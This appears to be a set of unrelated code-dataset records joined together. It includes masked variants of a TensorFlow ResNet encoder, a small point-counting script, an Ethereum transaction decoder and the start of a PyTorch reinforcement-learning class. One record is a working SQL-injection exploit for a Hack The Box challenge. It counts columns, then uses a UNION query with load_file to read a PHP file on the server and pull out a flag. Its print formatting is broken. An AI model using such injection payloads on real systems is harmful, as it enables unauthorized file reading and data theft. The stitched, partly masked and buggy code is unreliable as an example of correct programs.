"step-2": "<mask token>\n\n\ndef get_encoder(conf):\n if conf.encoder == 'linear':\n model = tf.keras.Sequential([tf.keras.layers.Dense(conf.d_model * 2\n ), tf.keras.layers.ReLU(), tf.keras.layers.Dense(conf.d_model)])\n return model\n if conf.encoder == 'rand_linear':\n model = get_stochastic_linear(conf)\n return model\n if conf.encoder[:5] == 'cifar':\n model = ResNet(BasicBlock, [3, 4, 6, 3], 4, low_dim=128, width=1, k\n =conf.k, linear=conf.linear)\n return model\n\n\n<mask token>\n\n\nclass BasicBlock(tf.keras.layers.Layer):\n EXPANSION = 1\n\n def __init__(self, channels, filters, strides=1):\n super().__init__()\n self.conv_1 = tf.keras.layers.Conv2D(filters=filters, kernel_size=3,\n strides=strides, padding='same', use_bias=False)\n self.bn_1 = tf.keras.layers.BatchNormalization()\n self.conv_2 = tf.keras.layers.Conv2D(filters=filters, kernel_size=3,\n strides=1, padding='same', use_bias=False)\n self.bn_2 = tf.keras.layers.BatchNormalization()\n self.shortcut = tf.keras.Sequential()\n if strides != 1 or channels != filters * self.EXPANSION:\n self.shortcut.add(tf.keras.layers.Conv2D(filters=self.EXPANSION *\n filters, kernel_size=1, strides=strides, use_bias=False))\n self.shortcut.add(tf.keras.layers.BatchNormalization())\n\n def call(self, inputs, training=True, mask=None):\n x = tf.nn.relu(self.bn_1(self.conv_1(inputs, training=training),\n training=training))\n x = self.bn_2(self.conv_2(x, training=training), training=training)\n x += self.shortcut(inputs, training=training)\n return tf.nn.relu(x)\n\n\nclass ResNet(tf.keras.Model):\n\n def __init__(self, block, num_blocks, pool_len=4, low_dim=128, width=1,\n k=10, linear=True):\n super().__init__()\n self.channels = 64\n self.pool_len = pool_len\n self.k = k\n self.linear = linear\n self.conv_1 = tf.keras.layers.Conv2D(filters=64, kernel_size=3,\n strides=1, padding='same', use_bias=False)\n self.bn_1 = tf.keras.layers.BatchNormalization()\n self.base = int(64 * width)\n self.residual = tf.keras.Sequential([self._make_layer(block, self.\n base, num_blocks[0], stride=1), self._make_layer(block, self.\n base * 2, num_blocks[1], stride=2), self._make_layer(block, \n self.base * 4, num_blocks[2], stride=2), self._make_layer(block,\n self.base * 8, num_blocks[3], stride=2)])\n if self.linear:\n self.fc = tf.keras.layers.Dense(low_dim)\n self.pool = tf.keras.layers.AveragePooling2D(pool_len, pool_len,\n data_format='channels_last')\n\n def _make_layer(self, block, planes, num_blocks, stride):\n strides = [stride] + [1] * (num_blocks - 1)\n layers = []\n for stride in strides:\n layers.append(block(self.channels, planes, stride))\n self.channels = planes * block.EXPANSION\n return tf.keras.Sequential(layers)\n\n def call(self, inputs, training=True, mask=None):\n x = tf.nn.relu(self.bn_1(self.conv_1(inputs, training=training),\n training=training))\n x = self.residual(x, training=training)\n x = self.pool(x)\n batch_size = tf.shape(x)[0]\n x = tf.reshape(x, [batch_size, -1])\n if self.linear:\n x = self.fc(x, training=training)\n return x\n\n\ndef test_resnet():\n model = ResNet(BasicBlock, [3, 4, 6, 3], 4, low_dim=128, width=1)\n a = tf.ones([7, 32, 32, 3])\n b = model(a)\n print(b)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef get_encoder(conf):\n if conf.encoder == 'linear':\n model = tf.keras.Sequential([tf.keras.layers.Dense(conf.d_model * 2\n ), tf.keras.layers.ReLU(), tf.keras.layers.Dense(conf.d_model)])\n return model\n if conf.encoder == 'rand_linear':\n model = get_stochastic_linear(conf)\n return model\n if conf.encoder[:5] == 'cifar':\n model = ResNet(BasicBlock, [3, 4, 6, 3], 4, low_dim=128, width=1, k\n =conf.k, linear=conf.linear)\n return model\n\n\ndef get_stochastic_linear(conf):\n model = tf.keras.Sequential([tf.keras.layers.GaussianNoise(0.3), tf.\n keras.layers.Dense(conf.d_model * 2), tf.keras.layers.ReLU(), tf.\n keras.layers.GaussianNoise(0.3), tf.keras.layers.Dense(conf.d_model)])\n return model\n\n\nclass BasicBlock(tf.keras.layers.Layer):\n EXPANSION = 1\n\n def __init__(self, channels, filters, strides=1):\n super().__init__()\n self.conv_1 = tf.keras.layers.Conv2D(filters=filters, kernel_size=3,\n strides=strides, padding='same', use_bias=False)\n self.bn_1 = tf.keras.layers.BatchNormalization()\n self.conv_2 = tf.keras.layers.Conv2D(filters=filters, kernel_size=3,\n strides=1, padding='same', use_bias=False)\n self.bn_2 = tf.keras.layers.BatchNormalization()\n self.shortcut = tf.keras.Sequential()\n if strides != 1 or channels != filters * self.EXPANSION:\n self.shortcut.add(tf.keras.layers.Conv2D(filters=self.EXPANSION *\n filters, kernel_size=1, strides=strides, use_bias=False))\n self.shortcut.add(tf.keras.layers.BatchNormalization())\n\n def call(self, inputs, training=True, mask=None):\n x = tf.nn.relu(self.bn_1(self.conv_1(inputs, training=training),\n training=training))\n x = self.bn_2(self.conv_2(x, training=training), training=training)\n x += self.shortcut(inputs, training=training)\n return tf.nn.relu(x)\n\n\nclass ResNet(tf.keras.Model):\n\n def __init__(self, block, num_blocks, pool_len=4, low_dim=128, width=1,\n k=10, linear=True):\n super().__init__()\n self.channels = 64\n self.pool_len = pool_len\n self.k = k\n self.linear = linear\n self.conv_1 = tf.keras.layers.Conv2D(filters=64, kernel_size=3,\n strides=1, padding='same', use_bias=False)\n self.bn_1 = tf.keras.layers.BatchNormalization()\n self.base = int(64 * width)\n self.residual = tf.keras.Sequential([self._make_layer(block, self.\n base, num_blocks[0], stride=1), self._make_layer(block, self.\n base * 2, num_blocks[1], stride=2), self._make_layer(block, \n self.base * 4, num_blocks[2], stride=2), self._make_layer(block,\n self.base * 8, num_blocks[3], stride=2)])\n if self.linear:\n self.fc = tf.keras.layers.Dense(low_dim)\n self.pool = tf.keras.layers.AveragePooling2D(pool_len, pool_len,\n data_format='channels_last')\n\n def _make_layer(self, block, planes, num_blocks, stride):\n strides = [stride] + [1] * (num_blocks - 1)\n layers = []\n for stride in strides:\n layers.append(block(self.channels, planes, stride))\n self.channels = planes * block.EXPANSION\n return tf.keras.Sequential(layers)\n\n def call(self, inputs, training=True, mask=None):\n x = tf.nn.relu(self.bn_1(self.conv_1(inputs, training=training),\n training=training))\n x = self.residual(x, training=training)\n x = self.pool(x)\n batch_size = tf.shape(x)[0]\n x = tf.reshape(x, [batch_size, -1])\n if self.linear:\n x = self.fc(x, training=training)\n return x\n\n\ndef test_resnet():\n model = ResNet(BasicBlock, [3, 4, 6, 3], 4, low_dim=128, width=1)\n a = tf.ones([7, 32, 32, 3])\n b = model(a)\n print(b)\n\n\nif __name__ == '__main__':\n test_resnet()\n",
"step-4": "from __future__ import absolute_import, print_function, division, unicode_literals\nimport tensorflow as tf\n\n\ndef get_encoder(conf):\n if conf.encoder == 'linear':\n model = tf.keras.Sequential([tf.keras.layers.Dense(conf.d_model * 2\n ), tf.keras.layers.ReLU(), tf.keras.layers.Dense(conf.d_model)])\n return model\n if conf.encoder == 'rand_linear':\n model = get_stochastic_linear(conf)\n return model\n if conf.encoder[:5] == 'cifar':\n model = ResNet(BasicBlock, [3, 4, 6, 3], 4, low_dim=128, width=1, k\n =conf.k, linear=conf.linear)\n return model\n\n\ndef get_stochastic_linear(conf):\n model = tf.keras.Sequential([tf.keras.layers.GaussianNoise(0.3), tf.\n keras.layers.Dense(conf.d_model * 2), tf.keras.layers.ReLU(), tf.\n keras.layers.GaussianNoise(0.3), tf.keras.layers.Dense(conf.d_model)])\n return model\n\n\nclass BasicBlock(tf.keras.layers.Layer):\n EXPANSION = 1\n\n def __init__(self, channels, filters, strides=1):\n super().__init__()\n self.conv_1 = tf.keras.layers.Conv2D(filters=filters, kernel_size=3,\n strides=strides, padding='same', use_bias=False)\n self.bn_1 = tf.keras.layers.BatchNormalization()\n self.conv_2 = tf.keras.layers.Conv2D(filters=filters, kernel_size=3,\n strides=1, padding='same', use_bias=False)\n self.bn_2 = tf.keras.layers.BatchNormalization()\n self.shortcut = tf.keras.Sequential()\n if strides != 1 or channels != filters * self.EXPANSION:\n self.shortcut.add(tf.keras.layers.Conv2D(filters=self.EXPANSION *\n filters, kernel_size=1, strides=strides, use_bias=False))\n self.shortcut.add(tf.keras.layers.BatchNormalization())\n\n def call(self, inputs, training=True, mask=None):\n x = tf.nn.relu(self.bn_1(self.conv_1(inputs, training=training),\n training=training))\n x = self.bn_2(self.conv_2(x, training=training), training=training)\n x += self.shortcut(inputs, training=training)\n return tf.nn.relu(x)\n\n\nclass ResNet(tf.keras.Model):\n\n def __init__(self, block, num_blocks, pool_len=4, low_dim=128, width=1,\n k=10, linear=True):\n super().__init__()\n self.channels = 64\n self.pool_len = pool_len\n self.k = k\n self.linear = linear\n self.conv_1 = tf.keras.layers.Conv2D(filters=64, kernel_size=3,\n strides=1, padding='same', use_bias=False)\n self.bn_1 = tf.keras.layers.BatchNormalization()\n self.base = int(64 * width)\n self.residual = tf.keras.Sequential([self._make_layer(block, self.\n base, num_blocks[0], stride=1), self._make_layer(block, self.\n base * 2, num_blocks[1], stride=2), self._make_layer(block, \n self.base * 4, num_blocks[2], stride=2), self._make_layer(block,\n self.base * 8, num_blocks[3], stride=2)])\n if self.linear:\n self.fc = tf.keras.layers.Dense(low_dim)\n self.pool = tf.keras.layers.AveragePooling2D(pool_len, pool_len,\n data_format='channels_last')\n\n def _make_layer(self, block, planes, num_blocks, stride):\n strides = [stride] + [1] * (num_blocks - 1)\n layers = []\n for stride in strides:\n layers.append(block(self.channels, planes, stride))\n self.channels = planes * block.EXPANSION\n return tf.keras.Sequential(layers)\n\n def call(self, inputs, training=True, mask=None):\n x = tf.nn.relu(self.bn_1(self.conv_1(inputs, training=training),\n training=training))\n x = self.residual(x, training=training)\n x = self.pool(x)\n batch_size = tf.shape(x)[0]\n x = tf.reshape(x, [batch_size, -1])\n if self.linear:\n x = self.fc(x, training=training)\n return x\n\n\ndef test_resnet():\n model = ResNet(BasicBlock, [3, 4, 6, 3], 4, low_dim=128, width=1)\n a = tf.ones([7, 32, 32, 3])\n b = model(a)\n print(b)\n\n\nif 
__name__ == '__main__':\n test_resnet()\n",
"step-5": "from __future__ import absolute_import, print_function, division, unicode_literals\nimport tensorflow as tf\n\n\ndef get_encoder(conf):\n if conf.encoder == 'linear':\n model = tf.keras.Sequential([tf.keras.layers.Dense(conf.d_model * 2),\n tf.keras.layers.ReLU(),\n tf.keras.layers.Dense(conf.d_model)])\n return model\n\n if conf.encoder == 'rand_linear':\n model = get_stochastic_linear(conf)\n return model\n if conf.encoder[:5] == 'cifar':\n model = ResNet(BasicBlock, [3, 4, 6, 3], 4, low_dim=128, width=1, k=conf.k, linear=conf.linear)\n return model\n\n\ndef get_stochastic_linear(conf):\n model = tf.keras.Sequential([tf.keras.layers.GaussianNoise(.3),\n tf.keras.layers.Dense(conf.d_model * 2),\n tf.keras.layers.ReLU(),\n tf.keras.layers.GaussianNoise(.3),\n tf.keras.layers.Dense(conf.d_model)])\n return model\n\n\n# noinspection PyAbstractClass\nclass BasicBlock(tf.keras.layers.Layer):\n EXPANSION = 1\n\n def __init__(self, channels, filters, strides=1):\n super().__init__()\n self.conv_1 = tf.keras.layers.Conv2D(filters=filters, kernel_size=3, strides=strides, padding='same',\n use_bias=False)\n self.bn_1 = tf.keras.layers.BatchNormalization()\n self.conv_2 = tf.keras.layers.Conv2D(filters=filters, kernel_size=3, strides=1, padding='same',\n use_bias=False)\n self.bn_2 = tf.keras.layers.BatchNormalization()\n self.shortcut = tf.keras.Sequential()\n if strides != 1 or channels != (filters * self.EXPANSION):\n self.shortcut.add(tf.keras.layers.Conv2D(filters=self.EXPANSION * filters, kernel_size=1, strides=strides,\n use_bias=False))\n self.shortcut.add(tf.keras.layers.BatchNormalization())\n\n def call(self, inputs, training=True, mask=None):\n x = tf.nn.relu(self.bn_1(self.conv_1(inputs, training=training), training=training))\n x = self.bn_2(self.conv_2(x, training=training), training=training)\n x += self.shortcut(inputs, training=training)\n return tf.nn.relu(x)\n\n\n# noinspection PyAbstractClass\nclass ResNet(tf.keras.Model):\n def __init__(self, block, num_blocks, pool_len=4, low_dim=128, width=1, k=10, linear=True):\n super().__init__()\n self.channels = 64\n self.pool_len = pool_len\n self.k = k\n self.linear = linear\n self.conv_1 = tf.keras.layers.Conv2D(filters=64, kernel_size=3, strides=1, padding='same', use_bias=False)\n self.bn_1 = tf.keras.layers.BatchNormalization()\n\n self.base = int(64 * width)\n self.residual = tf.keras.Sequential([\n self._make_layer(block, self.base, num_blocks[0], stride=1),\n self._make_layer(block, self.base * 2, num_blocks[1], stride=2),\n self._make_layer(block, self.base * 4, num_blocks[2], stride=2),\n self._make_layer(block, self.base * 8, num_blocks[3], stride=2)\n ])\n if self.linear:\n self.fc = tf.keras.layers.Dense(low_dim)\n self.pool = tf.keras.layers.AveragePooling2D(pool_len, pool_len, data_format='channels_last')\n\n def _make_layer(self, block, planes, num_blocks, stride):\n strides = [stride] + [1] * (num_blocks - 1)\n layers = []\n for stride in strides:\n layers.append(block(self.channels, planes, stride))\n self.channels = planes * block.EXPANSION\n return tf.keras.Sequential(layers)\n\n def call(self, inputs, training=True, mask=None):\n x = tf.nn.relu(self.bn_1(self.conv_1(inputs, training=training), training=training))\n x = self.residual(x, training=training)\n x = self.pool(x)\n\n batch_size = tf.shape(x)[0]\n x = tf.reshape(x, [batch_size, -1])\n if self.linear:\n x = self.fc(x, training=training)\n return x\n\n\ndef test_resnet():\n model = ResNet(BasicBlock, [3, 4, 6, 3], 4, low_dim=128, width=1)\n a = 
tf.ones([7, 32, 32, 3])\n b = model(a)\n print(b)\n\n\nif __name__ == '__main__':\n test_resnet()\n",
"step-ids": [
9,
10,
12,
13,
14
]
}
|
[
9,
10,
12,
13,
14
] |
N, D = map(int, input().split())
ans = 0
D2 = D*D
for i in range(N):
x, y = map(int, input().split())
if (x*x+y*y) <= D2:
ans += 1
print(ans)
|
normal
|
{
"blob_id": "947055d1d6acc50e1722d79ea30e327414cd9c41",
"index": 8523,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor i in range(N):\n x, y = map(int, input().split())\n if x * x + y * y <= D2:\n ans += 1\nprint(ans)\n",
"step-3": "N, D = map(int, input().split())\nans = 0\nD2 = D * D\nfor i in range(N):\n x, y = map(int, input().split())\n if x * x + y * y <= D2:\n ans += 1\nprint(ans)\n",
"step-4": "N, D = map(int, input().split())\nans = 0\nD2 = D*D\nfor i in range(N):\n x, y = map(int, input().split())\n if (x*x+y*y) <= D2:\n ans += 1\n\nprint(ans)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import requests
from bs4 import BeautifulSoup
import sys
import re
if len(sys.argv)<2:
print("Syntax : python %s <port>")%(str(sys.argv[0]))
else:
print('-'*55)
print("HTB WEB-CHALLENGE coded by ZyperX [Freelance]")
print('-'*55)
r=requests.session()
port=str(sys.argv[1])
url="http://docker.hackthebox.eu:"
url=url+port
uri="/portfolio.php?id=1"
url=url+uri
print("[*]SQLi Affected URI : %s")%(uri)
print("[*]Counting Columns")
for x in range(1,20):
payload=(" order by %i --+")%(x)
nurl=url+payload
op=r.get(nurl)
soup=BeautifulSoup(op.text,'html.parser')
soup=soup.find('p')
soup=str(soup)
size=len(soup.split())
print("[*]Page size at order by %s : %s")%(x,size)
if size < 36 :
col= x-1
break
print("-"*55)
print("[*]Number of Columns : %d")%(col)
print("[*]Web App Vulnerable with FILE PRIVILEGE SQLI")
print("[*]Trying to read content of \'/var/www/html/administrat/panel.php\'")
upayload=" union all select 1"
for x in range(2,col+1):
x=str(x)
upayload=upayload+","+x
upayload=upayload+" --+"
url=url+upayload
print("[*]Executing. : %s")%(url)
op=r.get(url)
op=str(op.text)
if op.find("2"):
print("[*]Column 2 is reflected");
print("[*]Injecting payloads in column 2....");
upayload=upayload.replace('2','load_file(\'/var/www/html/administrat/panel.php\')')
url="http://docker.hackthebox.eu:"+port+uri+upayload
print("[*]Excecuting : %s")%(url)
op=r.get(url)
op=str(op.text)
op=re.search("HTB.*?<",op)
op=str(op.group())
op=op.replace('<','')
print("-"*55)
print("[*]Flag : %s")%(op)
|
normal
|
{
"blob_id": "88ec9484e934ce27b13734ca26f79df71b7677e6",
"index": 82,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif len(sys.argv) < 2:\n print('Syntax : python %s <port>') % str(sys.argv[0])\nelse:\n print('-' * 55)\n print('HTB WEB-CHALLENGE coded by ZyperX [Freelance]')\n print('-' * 55)\n r = requests.session()\n port = str(sys.argv[1])\n url = 'http://docker.hackthebox.eu:'\n url = url + port\n uri = '/portfolio.php?id=1'\n url = url + uri\n print('[*]SQLi Affected URI : %s') % uri\n print('[*]Counting Columns')\n for x in range(1, 20):\n payload = ' order by %i --+' % x\n nurl = url + payload\n op = r.get(nurl)\n soup = BeautifulSoup(op.text, 'html.parser')\n soup = soup.find('p')\n soup = str(soup)\n size = len(soup.split())\n print('[*]Page size at order by %s : %s') % (x, size)\n if size < 36:\n col = x - 1\n break\n print('-' * 55)\n print('[*]Number of Columns : %d') % col\n print('[*]Web App Vulnerable with FILE PRIVILEGE SQLI')\n print(\"[*]Trying to read content of '/var/www/html/administrat/panel.php'\")\n upayload = ' union all select 1'\n for x in range(2, col + 1):\n x = str(x)\n upayload = upayload + ',' + x\n<mask token>\nprint('[*]Executing. : %s') % url\n<mask token>\nif op.find('2'):\n print('[*]Column 2 is reflected')\n print('[*]Injecting payloads in column 2....')\n<mask token>\nprint('[*]Excecuting : %s') % url\n<mask token>\nprint('-' * 55)\nprint('[*]Flag : %s') % op\n",
"step-3": "<mask token>\nif len(sys.argv) < 2:\n print('Syntax : python %s <port>') % str(sys.argv[0])\nelse:\n print('-' * 55)\n print('HTB WEB-CHALLENGE coded by ZyperX [Freelance]')\n print('-' * 55)\n r = requests.session()\n port = str(sys.argv[1])\n url = 'http://docker.hackthebox.eu:'\n url = url + port\n uri = '/portfolio.php?id=1'\n url = url + uri\n print('[*]SQLi Affected URI : %s') % uri\n print('[*]Counting Columns')\n for x in range(1, 20):\n payload = ' order by %i --+' % x\n nurl = url + payload\n op = r.get(nurl)\n soup = BeautifulSoup(op.text, 'html.parser')\n soup = soup.find('p')\n soup = str(soup)\n size = len(soup.split())\n print('[*]Page size at order by %s : %s') % (x, size)\n if size < 36:\n col = x - 1\n break\n print('-' * 55)\n print('[*]Number of Columns : %d') % col\n print('[*]Web App Vulnerable with FILE PRIVILEGE SQLI')\n print(\"[*]Trying to read content of '/var/www/html/administrat/panel.php'\")\n upayload = ' union all select 1'\n for x in range(2, col + 1):\n x = str(x)\n upayload = upayload + ',' + x\nupayload = upayload + ' --+'\nurl = url + upayload\nprint('[*]Executing. : %s') % url\nop = r.get(url)\nop = str(op.text)\nif op.find('2'):\n print('[*]Column 2 is reflected')\n print('[*]Injecting payloads in column 2....')\nupayload = upayload.replace('2',\n \"load_file('/var/www/html/administrat/panel.php')\")\nurl = 'http://docker.hackthebox.eu:' + port + uri + upayload\nprint('[*]Excecuting : %s') % url\nop = r.get(url)\nop = str(op.text)\nop = re.search('HTB.*?<', op)\nop = str(op.group())\nop = op.replace('<', '')\nprint('-' * 55)\nprint('[*]Flag : %s') % op\n",
"step-4": "import requests\nfrom bs4 import BeautifulSoup\nimport sys\nimport re\nif len(sys.argv) < 2:\n print('Syntax : python %s <port>') % str(sys.argv[0])\nelse:\n print('-' * 55)\n print('HTB WEB-CHALLENGE coded by ZyperX [Freelance]')\n print('-' * 55)\n r = requests.session()\n port = str(sys.argv[1])\n url = 'http://docker.hackthebox.eu:'\n url = url + port\n uri = '/portfolio.php?id=1'\n url = url + uri\n print('[*]SQLi Affected URI : %s') % uri\n print('[*]Counting Columns')\n for x in range(1, 20):\n payload = ' order by %i --+' % x\n nurl = url + payload\n op = r.get(nurl)\n soup = BeautifulSoup(op.text, 'html.parser')\n soup = soup.find('p')\n soup = str(soup)\n size = len(soup.split())\n print('[*]Page size at order by %s : %s') % (x, size)\n if size < 36:\n col = x - 1\n break\n print('-' * 55)\n print('[*]Number of Columns : %d') % col\n print('[*]Web App Vulnerable with FILE PRIVILEGE SQLI')\n print(\"[*]Trying to read content of '/var/www/html/administrat/panel.php'\")\n upayload = ' union all select 1'\n for x in range(2, col + 1):\n x = str(x)\n upayload = upayload + ',' + x\nupayload = upayload + ' --+'\nurl = url + upayload\nprint('[*]Executing. : %s') % url\nop = r.get(url)\nop = str(op.text)\nif op.find('2'):\n print('[*]Column 2 is reflected')\n print('[*]Injecting payloads in column 2....')\nupayload = upayload.replace('2',\n \"load_file('/var/www/html/administrat/panel.php')\")\nurl = 'http://docker.hackthebox.eu:' + port + uri + upayload\nprint('[*]Excecuting : %s') % url\nop = r.get(url)\nop = str(op.text)\nop = re.search('HTB.*?<', op)\nop = str(op.group())\nop = op.replace('<', '')\nprint('-' * 55)\nprint('[*]Flag : %s') % op\n",
"step-5": "import requests\nfrom bs4 import BeautifulSoup\nimport sys\nimport re\nif len(sys.argv)<2:\n print(\"Syntax : python %s <port>\")%(str(sys.argv[0]))\nelse:\n print('-'*55)\n print(\"HTB WEB-CHALLENGE coded by ZyperX [Freelance]\")\n print('-'*55)\n r=requests.session()\n port=str(sys.argv[1])\n url=\"http://docker.hackthebox.eu:\"\n url=url+port\n uri=\"/portfolio.php?id=1\"\n url=url+uri\n print(\"[*]SQLi Affected URI : %s\")%(uri)\n print(\"[*]Counting Columns\")\n for x in range(1,20):\n payload=(\" order by %i --+\")%(x)\n nurl=url+payload\n op=r.get(nurl)\n soup=BeautifulSoup(op.text,'html.parser')\n soup=soup.find('p')\n soup=str(soup)\n size=len(soup.split())\n print(\"[*]Page size at order by %s : %s\")%(x,size)\n if size < 36 :\n col= x-1\n break \n print(\"-\"*55)\n print(\"[*]Number of Columns : %d\")%(col)\n print(\"[*]Web App Vulnerable with FILE PRIVILEGE SQLI\")\n print(\"[*]Trying to read content of \\'/var/www/html/administrat/panel.php\\'\")\n upayload=\" union all select 1\"\n for x in range(2,col+1):\n x=str(x)\n upayload=upayload+\",\"+x\nupayload=upayload+\" --+\"\nurl=url+upayload\nprint(\"[*]Executing. : %s\")%(url)\nop=r.get(url)\nop=str(op.text)\nif op.find(\"2\"):\n print(\"[*]Column 2 is reflected\");\n print(\"[*]Injecting payloads in column 2....\");\nupayload=upayload.replace('2','load_file(\\'/var/www/html/administrat/panel.php\\')')\nurl=\"http://docker.hackthebox.eu:\"+port+uri+upayload\nprint(\"[*]Excecuting : %s\")%(url)\nop=r.get(url)\nop=str(op.text)\nop=re.search(\"HTB.*?<\",op)\nop=str(op.group())\nop=op.replace('<','')\nprint(\"-\"*55)\nprint(\"[*]Flag : %s\")%(op)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from ethereum.abi import (
decode_abi,
normalize_name as normalize_abi_method_name,
method_id as get_abi_method_id)
from ethereum.utils import encode_int, zpad, decode_hex
import json
import time
from web3 import Web3, HTTPProvider, TestRPCProvider
from solc import compile_source
from web3.contract import ConciseContract
import sys
import os
Cpath = os.path.dirname(os.path.realpath(__file__))
host = 'localhost'
TID = sys.argv[1]
# web3.py instance
w3 = Web3(HTTPProvider('http://'+host+':3000'))
f = open(Cpath+'/abi','r')
line = f.readline()
Jline = json.loads(line)
f.close()
abi = Jline
Transaction = w3.eth.getTransaction(TID)
#print(Transaction.input)
def decode_contract_call(contract_abi: list, call_data: str):
call_data_bin = decode_hex(call_data)
method_signature = call_data_bin[:4]
for description in contract_abi:
if description.get('type') != 'function':
continue
method_name = normalize_abi_method_name(description['name'])
arg_types = [item['type'] for item in description['inputs']]
method_id = get_abi_method_id(method_name, arg_types)
if zpad(encode_int(method_id), 4) == method_signature:
try:
args = decode_abi(arg_types, call_data_bin[4:])
except AssertionError:
# Invalid args
continue
return method_name, args
result = decode_contract_call(abi,Transaction.input)
#result = decode_contract_call(abi,"0xa9059cbb0000000000000000000000006cd5d27785e38b28a0d9656bcc795d90a4d670c500000000000000000000000000000000000000000000000000000000000001f4")
print(result)
print(Transaction['from'])
|
normal
|
{
"blob_id": "6437cb90ebaed7cf59df780062ebccf77fcef084",
"index": 4123,
"step-1": "<mask token>\n\n\ndef decode_contract_call(contract_abi: list, call_data: str):\n call_data_bin = decode_hex(call_data)\n method_signature = call_data_bin[:4]\n for description in contract_abi:\n if description.get('type') != 'function':\n continue\n method_name = normalize_abi_method_name(description['name'])\n arg_types = [item['type'] for item in description['inputs']]\n method_id = get_abi_method_id(method_name, arg_types)\n if zpad(encode_int(method_id), 4) == method_signature:\n try:\n args = decode_abi(arg_types, call_data_bin[4:])\n except AssertionError:\n continue\n return method_name, args\n\n\n<mask token>\n",
"step-2": "<mask token>\nf.close()\n<mask token>\n\n\ndef decode_contract_call(contract_abi: list, call_data: str):\n call_data_bin = decode_hex(call_data)\n method_signature = call_data_bin[:4]\n for description in contract_abi:\n if description.get('type') != 'function':\n continue\n method_name = normalize_abi_method_name(description['name'])\n arg_types = [item['type'] for item in description['inputs']]\n method_id = get_abi_method_id(method_name, arg_types)\n if zpad(encode_int(method_id), 4) == method_signature:\n try:\n args = decode_abi(arg_types, call_data_bin[4:])\n except AssertionError:\n continue\n return method_name, args\n\n\n<mask token>\nprint(result)\nprint(Transaction['from'])\n",
"step-3": "<mask token>\nCpath = os.path.dirname(os.path.realpath(__file__))\nhost = 'localhost'\nTID = sys.argv[1]\nw3 = Web3(HTTPProvider('http://' + host + ':3000'))\nf = open(Cpath + '/abi', 'r')\nline = f.readline()\nJline = json.loads(line)\nf.close()\nabi = Jline\nTransaction = w3.eth.getTransaction(TID)\n\n\ndef decode_contract_call(contract_abi: list, call_data: str):\n call_data_bin = decode_hex(call_data)\n method_signature = call_data_bin[:4]\n for description in contract_abi:\n if description.get('type') != 'function':\n continue\n method_name = normalize_abi_method_name(description['name'])\n arg_types = [item['type'] for item in description['inputs']]\n method_id = get_abi_method_id(method_name, arg_types)\n if zpad(encode_int(method_id), 4) == method_signature:\n try:\n args = decode_abi(arg_types, call_data_bin[4:])\n except AssertionError:\n continue\n return method_name, args\n\n\nresult = decode_contract_call(abi, Transaction.input)\nprint(result)\nprint(Transaction['from'])\n",
"step-4": "from ethereum.abi import decode_abi, normalize_name as normalize_abi_method_name, method_id as get_abi_method_id\nfrom ethereum.utils import encode_int, zpad, decode_hex\nimport json\nimport time\nfrom web3 import Web3, HTTPProvider, TestRPCProvider\nfrom solc import compile_source\nfrom web3.contract import ConciseContract\nimport sys\nimport os\nCpath = os.path.dirname(os.path.realpath(__file__))\nhost = 'localhost'\nTID = sys.argv[1]\nw3 = Web3(HTTPProvider('http://' + host + ':3000'))\nf = open(Cpath + '/abi', 'r')\nline = f.readline()\nJline = json.loads(line)\nf.close()\nabi = Jline\nTransaction = w3.eth.getTransaction(TID)\n\n\ndef decode_contract_call(contract_abi: list, call_data: str):\n call_data_bin = decode_hex(call_data)\n method_signature = call_data_bin[:4]\n for description in contract_abi:\n if description.get('type') != 'function':\n continue\n method_name = normalize_abi_method_name(description['name'])\n arg_types = [item['type'] for item in description['inputs']]\n method_id = get_abi_method_id(method_name, arg_types)\n if zpad(encode_int(method_id), 4) == method_signature:\n try:\n args = decode_abi(arg_types, call_data_bin[4:])\n except AssertionError:\n continue\n return method_name, args\n\n\nresult = decode_contract_call(abi, Transaction.input)\nprint(result)\nprint(Transaction['from'])\n",
"step-5": "from ethereum.abi import (\n decode_abi,\n normalize_name as normalize_abi_method_name,\n method_id as get_abi_method_id)\nfrom ethereum.utils import encode_int, zpad, decode_hex\n\nimport json\nimport time\nfrom web3 import Web3, HTTPProvider, TestRPCProvider\nfrom solc import compile_source\nfrom web3.contract import ConciseContract\nimport sys\nimport os\nCpath = os.path.dirname(os.path.realpath(__file__))\n\nhost = 'localhost'\nTID = sys.argv[1]\n\n# web3.py instance\nw3 = Web3(HTTPProvider('http://'+host+':3000'))\nf = open(Cpath+'/abi','r')\nline = f.readline()\nJline = json.loads(line)\nf.close()\n\nabi = Jline\n\nTransaction = w3.eth.getTransaction(TID)\n#print(Transaction.input)\n\n\ndef decode_contract_call(contract_abi: list, call_data: str):\n call_data_bin = decode_hex(call_data)\n method_signature = call_data_bin[:4]\n for description in contract_abi:\n if description.get('type') != 'function':\n continue\n method_name = normalize_abi_method_name(description['name'])\n arg_types = [item['type'] for item in description['inputs']]\n method_id = get_abi_method_id(method_name, arg_types)\n if zpad(encode_int(method_id), 4) == method_signature:\n try:\n args = decode_abi(arg_types, call_data_bin[4:])\n except AssertionError:\n # Invalid args\n continue\n return method_name, args\n\nresult = decode_contract_call(abi,Transaction.input)\n#result = decode_contract_call(abi,\"0xa9059cbb0000000000000000000000006cd5d27785e38b28a0d9656bcc795d90a4d670c500000000000000000000000000000000000000000000000000000000000001f4\")\nprint(result)\nprint(Transaction['from'])\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
import logging
import time
import random
import pickle
import os
from sys import maxsize
import torch
from tensorboardX import SummaryWriter
from baselines.common.schedules import LinearSchedule
from abp.utils import clear_summary_path
from abp.models.feature_q_model import feature_q_model
from abp.adaptives.common.prioritized_memory.memory_gqf import ReplayBuffer_decom
import numpy as np
logger = logging.getLogger('root')
use_cuda = torch.cuda.is_available()
FloatTensor = torch.cuda.FloatTensor if use_cuda else torch.FloatTensor
LongTensor = torch.cuda.LongTensor if use_cuda else torch.LongTensor
IntTensor = torch.cuda.IntTensor if use_cuda else torch.IntTensor
ByteTensor = torch.cuda.ByteTensor if use_cuda else torch.ByteTensor
Tensor = FloatTensor
class SADQ_GQF(object):
"""Adaptive which uses the SADQ algorithm"""
def __init__(self, name, state_length, network_config, reinforce_config, feature_len, combine_decomposed_func, is_sigmoid = False, memory_resotre = True):
super(SADQ_GQF, self).__init__()
self.name = name
